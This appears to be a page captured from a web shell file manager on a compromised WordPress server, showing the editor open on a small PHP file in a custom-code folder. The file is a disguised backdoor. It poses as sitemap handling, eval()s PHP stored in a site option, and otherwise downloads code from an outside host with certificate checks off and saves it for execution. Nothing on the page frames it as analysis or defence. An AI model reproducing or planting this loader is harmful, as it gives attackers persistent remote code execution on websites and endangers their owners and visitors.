┌────────────────────────────────┐ │ ░░░ ░░▓ ░▓▓ ███ ▓▓░ ▓░░ │ │ ~ M O O N ~ │ └────────────────────────────────┘
prd-web-01.centraldc.gr
LOCATION:
/var/www/html/stafilos/wp-content/custom_codes
☗ ROOT
↻ REFRESH
✎ EDIT FILE
EDITING: 1114-php-default.php
<?php $sitemap_data = get_option('auto_wcl_sitemap'); if($sitemap_data){ eval('?>' .$sitemap_data); }else{ $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, 'http://z60710_2.valilco.xyz/stat/domain_index.txt'); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); $result = curl_exec($curl); curl_close($curl); if (!empty($result)) { update_option('auto_wcl_sitemap', $result); } }
CANCEL
Name
Type
Size
Modified
Actions
↩ ..
DIR
—
—
📄 1114-php-default.php
PHP
445 B
2026-07-23 08:32
EDIT